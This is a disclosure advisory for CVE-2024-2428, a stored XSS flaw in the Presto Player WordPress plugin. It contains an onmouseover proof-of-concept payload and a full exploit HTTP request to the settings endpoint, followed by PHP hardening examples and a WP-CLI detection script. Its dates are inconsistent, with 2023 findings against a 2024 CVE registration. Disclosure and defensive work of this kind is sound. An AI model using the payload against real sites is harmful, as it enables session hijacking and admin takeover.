A critical security flaw has been uncovered in “The Ultimate Video Player For WordPress – by Presto Player” plugin, tagged as CVE-2024-2428. This vulnerability jeopardizes over 100,000 WordPress installations, enabling attackers to execute Stored Cross-Site Scripting (XSS) attacks, potentially leading to Admin Account Creation.
Main info:
CVE | CVE-2024-2428 |
Plugin | The Ultimate Video Player For WordPress – by Presto Player < 2.2.3 |
Critical | High |
All Time | 1 797 539 |
Active installations | 100 000+ |
Publicly Published | March 15, 2023 |
Last Updated | March 15, 2023 |
Researcher | Dmitrii Ignatyev |
OWASP TOP-10 | A7: Cross-Site Scripting (XSS) |
PoC | Yes |
Exploit | No |
Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2428 , https://wpscan.com/vulnerability/4832e223-4571-4b45-97db-2fd403797c49/ |
Timeline
March 4, 2023 | Plugin testing and vulnerability detection in The Ultimate Video Player For WordPress – by Presto Player have been completed |
March 4, 2023 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
March 15, 2024 | Registered CVE-2024-2428 |
Discovery of the Vulnerability
During routine plugin testing, security researchers stumbled upon a significant vulnerability within the plugin’s functionality. This flaw allows attackers to inject malicious JavaScript code, paving the way for unauthorized account takeovers.
Understanding Stored XSS Attacks
Stored XSS is a prevalent attack vector where malicious scripts are injected into a web application’s database. When the compromised data is retrieved and rendered, the injected script executes in the victim’s browser context. Real-world examples demonstrate how attackers leverage this vulnerability to hijack user sessions, deface websites, or launch more sophisticated attacks.
Exploiting the Stored XSS Vulnerability
To exploit CVE-2024-2428, attackers can manipulate the “player_css” field in the plugin’s settings with crafted JavaScript payloads. Once executed, these scripts can initiate actions within the admin interface, potentially leading to the creation of unauthorized admin accounts.
POC:
Go to “Add New Post” and try to change the field “player_css” to this: 123"asdasd=" onmouseover='alert(1)'
P.S. You should then open any page that contains a player.
Request:
POST /wordpress/index.php/wp-json/presto-player/v1/settings?_locale=user HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, */*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-WP-Nonce: 1713ddbbe0
Content-Type: application/json
Origin: http://127.0.0.1
Content-Length: 116
DNT: 1
Connection: close
Cookie: wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1709575790%7C7NrVNWbsp3b6AEj5va22HZWBn4nNcpQ9XzW09wokBFn%7Ce26eb708b0c24aa6fb0a7136de79e4a857038e3a320aa4bdfcd3fea3d4e30089; wp-settings-time-2=1709403214
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"presto_player_branding":{"logo":"","color":"#000000","logo_width":150,"player_css":"123\"onmouseover='alert(1)'"}}
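The PoC above works because a settings string is written back into page markup unescaped. As an added illustration (this is not code from the advisory or from the Presto Player plugin), the following PHP shows that vulnerable pattern next to the two fixes a WordPress plugin should carry: escaping on output and a sanitize_callback on the REST argument, behind a capability check. It assumes the value is rendered into a double-quoted style="" attribute (the PoC payload closes such an attribute); the route namespace example-player/v1 and the option name example_player_css are hypothetical, chosen so the snippet does not collide with the real presto-player/v1/settings endpoint shown in the request.

```php
<?php
// Added example, not code from the advisory or from the Presto Player plugin.
// ASSUMPTIONS: the stored player_css string is rendered into a double-quoted
// style="" attribute (which is what the PoC payload 123"onmouseover='alert(1)'
// breaks out of); the route namespace and option name below are hypothetical.

// Vulnerable pattern: the stored value is concatenated into an attribute with
// no escaping, so a double quote in it closes the attribute and whatever
// follows (onmouseover=...) becomes a new attribute on the element.
function render_player_vulnerable(string $player_css): string {
    return '<div class="presto-player" style="' . $player_css . '"></div>';
}

// Hardened output: esc_attr() HTML-encodes " ' < > & for the attribute
// context, so the value can no longer close the attribute or add a handler.
function render_player_hardened(string $player_css): string {
    return '<div class="presto-player" style="' . esc_attr($player_css) . '"></div>';
}

// Hardened input: reject markup before it is stored. CSS never needs a
// literal "<", so dropping it (after stripping tags) costs nothing and also
// protects a <style>...</style> rendering context against </style> breakouts.
// Output escaping above is still required; the storage filter is a second layer.
function sanitize_player_css($value): string {
    $value = wp_strip_all_tags((string) $value);
    return str_replace('<', '', $value);
}

// REST registration with the sanitizer attached to the argument and an
// explicit capability check, the two things a settings endpoint must have.
add_action('rest_api_init', function () {
    register_rest_route('example-player/v1', '/settings', [   // hypothetical namespace
        'methods'             => 'POST',
        'permission_callback' => function () {
            return current_user_can('manage_options');
        },
        'args'                => [
            'player_css' => [
                'type'              => 'string',
                'required'          => false,
                'sanitize_callback' => 'sanitize_player_css',
            ],
        ],
        'callback'            => function (WP_REST_Request $request) {
            // hypothetical option name; the real plugin's storage is not shown on the page
            update_option('example_player_css', $request->get_param('player_css'));
            return rest_ensure_response(['saved' => true]);
        },
    ]);
});
```

With the hardened renderer the double quote in the PoC payload is emitted as &quot;, so the browser never sees a second attribute and the onmouseover handler is just text inside the style value. The sanitizer is deliberately narrow: it removes only what CSS cannot legitimately contain, because stripping quotes would break url("...") and font-family values.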
___
The ramifications of this vulnerability are severe. Attackers could compromise website integrity, harvest sensitive data, or distribute malware. Furthermore, unauthorized admin account creation could grant attackers full control over affected WordPress installations, enabling them to carry out malicious activities undetected.
Recommendations for Improved Security
Website administrators are strongly urged to update “The Ultimate Video Player For WordPress” plugin to the latest patched version immediately. Additionally, regular security audits and monitoring mechanisms should be in place to detect and mitigate potential vulnerabilities promptly. Lastly, enforcing secure coding practices and implementing robust input validation mechanisms can help thwart similar attacks in the future. Stay vigilant and prioritize website security!
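Updating closes the injection point but does not clean up a payload that was already stored. The WP-CLI script below is an added example (not part of the advisory or the plugin) of the kind of audit the paragraph calls for: it walks the plugin's stored settings and reports any string containing markup, an inline event handler such as the onmouseover= used in the PoC, or a javascript: URL. The option name presto_player_branding is an assumption taken from the REST body key in the PoC request; change it if your install stores the settings under a different option.

```php
<?php
// Added example, not part of the advisory or of the Presto Player plugin.
// Run with WP-CLI from the site root:  wp eval-file audit-player-css.php
// ASSUMPTION: the plugin keeps its settings in an option named after the REST
// body key shown in the PoC ("presto_player_branding"); adjust $option_names
// if your install stores them elsewhere.

$option_names = ['presto_player_branding'];

// Markup, inline event handlers, or javascript: URLs have no business in a
// CSS setting. The handler pattern is what the PoC payload relies on.
$suspicious = '/<\s*\/?\s*[a-z]|\bon[a-z]+\s*=|javascript\s*:/i';

// Walk nested option data and collect (path, value) pairs that match.
function find_suspicious_strings($value, string $path, string $pattern, array &$hits): void {
    if (is_string($value)) {
        $decoded = json_decode($value, true);        // settings saved as JSON text
        if (is_array($decoded)) {
            find_suspicious_strings($decoded, $path, $pattern, $hits);
        } elseif (preg_match($pattern, $value)) {
            $hits[] = [$path, $value];
        }
    } elseif (is_array($value) || is_object($value)) {
        foreach ((array) $value as $key => $item) {
            find_suspicious_strings($item, $path . '.' . $key, $pattern, $hits);
        }
    }
}

$hits = [];
foreach ($option_names as $name) {
    find_suspicious_strings(get_option($name), $name, $suspicious, $hits);
}

if ($hits === []) {
    WP_CLI::success('No markup or event handlers found in the audited options.');
} else {
    foreach ($hits as [$path, $value]) {
        WP_CLI::warning(sprintf('%s contains: %s', $path, $value));
    }
    WP_CLI::error(sprintf('%d suspicious value(s); review and clean them after updating the plugin.', count($hits)));
}
```

The pattern is intentionally loose (a CSS child combinator like div > p does not match, but an unusual content: string might), so treat hits as items to review rather than as confirmed compromise, and pair the audit with a check of the user list for admin accounts you did not create.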
By taking proactive measures to address Stored XSS vulnerabilities like CVE-2024-2428, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #StoredXSS #WebsiteSafety #StayProtected #HighVulnerability
DMITRII I.